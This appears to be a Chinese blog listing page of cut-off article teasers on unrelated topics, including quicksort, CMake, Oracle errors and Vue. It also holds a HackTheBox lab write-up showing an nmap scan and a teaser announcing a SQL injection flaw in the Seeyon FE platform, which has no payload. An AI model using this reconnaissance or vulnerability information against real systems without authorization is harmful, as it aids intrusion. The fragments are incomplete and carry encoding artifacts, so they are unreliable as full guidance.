目录 思想 演示 代码实现 解释 优化 三数取中 小区间优化 补充 挖坑法 双指针法 非递归实现 思想 快速排序是一种二叉树结构的交换排序方法。 基本思想为&#xff1a;任取待排序元素序列中的某元素作为基准值&#xff0c;按照该排序码将待排序集合分割成两子序列&am…

[渗透测试学习] SolarLab-HackTheBox

SolarLab-HackTheBox 信息搜集 nmap扫描端口 nmap -sV -v 10.10.11.16扫描结果如下 PORT STATE SERVICE VERSION 80/tcp open http nginx 1.24.0 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows n…

【漏洞复现】致远互联FE协作办公平台 ncsubjass SQL注入

0x01 产品简介 致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。它集成了多个功能模块&#xff0c;旨在帮助企业实现高效的团队协作、信息共享和文档管理。 0x02 漏洞概述 致远互联FE协作办公平台 ncsubjass.jsp接口处存在SQL注入漏洞,未经身份验证的…

1.4k star 项目 CMakeTutorial 阅读和点评

1.4k star 项目 CMakeTutorial 阅读和点评 文章目录 1.4k star 项目 CMakeTutorial 阅读和点评0. 概要1. CUDA 目录2. FindPackage 目录3. Installation 目录4. PackageManage 目录5. PythonExtension 目录6. ImportExternalProject 目录总结 0. 概要 在 github 搜索关键字 CM…

ORA-12560: TNS:协议适配器错误

项目场景&#xff1a; 由于最近一直没有连接oracle&#xff0c;然后之前windows也是正常可以启动oracle&#xff0c;正常连接。无论是SQL Developer还是SQL PLUS命令&#xff0c;都能正常连接和操作。 问题描述 这两天刚好用SQL Developer工具连接&#xff0c;然后报错&#…

vue中通过自定义指令实现一个可拖拽,缩放的弹窗

效果 功能描述 按住头部可拖拽鼠标放到边框&#xff0c;可缩放多层重叠丰富的插槽&#xff0c;易于扩展 示例 指令代码 export const dragDialog {inserted: function (el, { value, minWidth 400, minHeight 200 }) {// 让弹窗居中let dialogHeight el.clientHeight ?…

和鲸101计划:以神经计算建模培训,助力北大学术人才培养

探索与求知&#xff0c;培养与传承。 让青年人更早地触摸到科学研究的前沿&#xff0c;便能吸引更多人才投身于学科建设。 11月4日&#xff0c;由北京大学信息处理实验室开展进行&#xff0c;北京大学心理与认知科学学院院长吴思教授及课题组成员授课的第二届神经计算建模及编…

C#心跳机制客户端

窗体&#xff08;richTextBox右显示聊天&#xff09; 步骤 点击链接按钮 tcpclient客户端步骤 1创建客户端对象 2连接服务器connect 3创建网络基础流发消息 .write发消息 4 创建网络基础流接消息 .read接消息 5 断开连接…

Spring注解----------@Deprecated

情景&#xff1a; 在我们开发过程中&#xff0c;有时候会遇到我们需要将几个类中的方法集中到一个类中&#xff0c;但是我们又不希望把我们的原来的类删掉&#xff08;就是单纯的不想删除&#xff0c;都是我写的代码我不想杀死我的结晶&#xff0c;不能说我写的是shi&#xff…

【C语言】--- 常见调试信息预处理器宏

在编程的艺术世界里&#xff0c;代码和灵感需要寻找到最佳的交融点&#xff0c;才能打造出令人为之惊叹的作品。而在这座秋知叶i博客的殿堂里&#xff0c;我们将共同追寻这种完美结合&#xff0c;为未来的世界留下属于我们的独特印记。 【C语言】--- 常见调试信息预处理器宏 开…

Multisim仿真之万用表、安捷伦万用表、信号发生器操作方法

1、XMM是安捷伦示波器 如下图所示&#xff0c;实物安捷伦的外围3个插孔对应于 XMM图标示波器的右侧3个引脚&#xff0c;上下一一对应 2、函数信号发生器XFG 如下图所示&#xff0c;COM就是GND&#xff0c;正负的意思就是相对于GND而言&#xff0c;有正负电压&#xff1b; 3、…

vivado PIP or SITE_PIP、PKGPIN_BYTEGROUP

PIP是Xilinx部件上用于路由连接或网络的设备对象。PIP 称为ARC的连接多路复用器可以编程为将一根电线连接到 另一个&#xff0c;从而将节点连接在一起&#xff0c;以形成中特定NET所需的路由 设计。 SITE_PIP&#xff0c;也称为路由BEL&#xff0c;是SITE内部的连接多路复用器&…

JavaFX按钮

当用户单击按钮时&#xff0c;JavaFX Button类可以触发事件。Button类扩展了Labeled类&#xff0c;可以显示文本&#xff0c;图像或两者都可以。 以下代码显示了如何向Button添加单击操作侦听器。 import javafx.application.Application; import javafx.event.ActionEvent; im…

【信息学奥赛】CSP-J/S初赛03 计算机网络与编程语言分类

第1节 计算机网络基础 1.1 网络的定义 所谓计算机网络&#xff0c;就是利用通信线路和设备&#xff0c;把分布在不同地理位置上的多台计算机连 接起来。计算机网络是现代通信技术与计算机技术相结合的产物。 网络中计算机与计算机之间的通信依靠协议进行。协议是计算机收、发…

Postman文件数据导入导出

前言 不同的接口测试工具如Postman、Apipost、Apifox创建的接口文档都是互通的&#xff0c;都可以互相兼容使用。我们就不需要在3个不同测试工具都去创建&#xff0c;只要在一个工具上创建&#xff0c;想要在其他接口测试工具上使用就运用导入和导出功能即可。 Postman、Apip…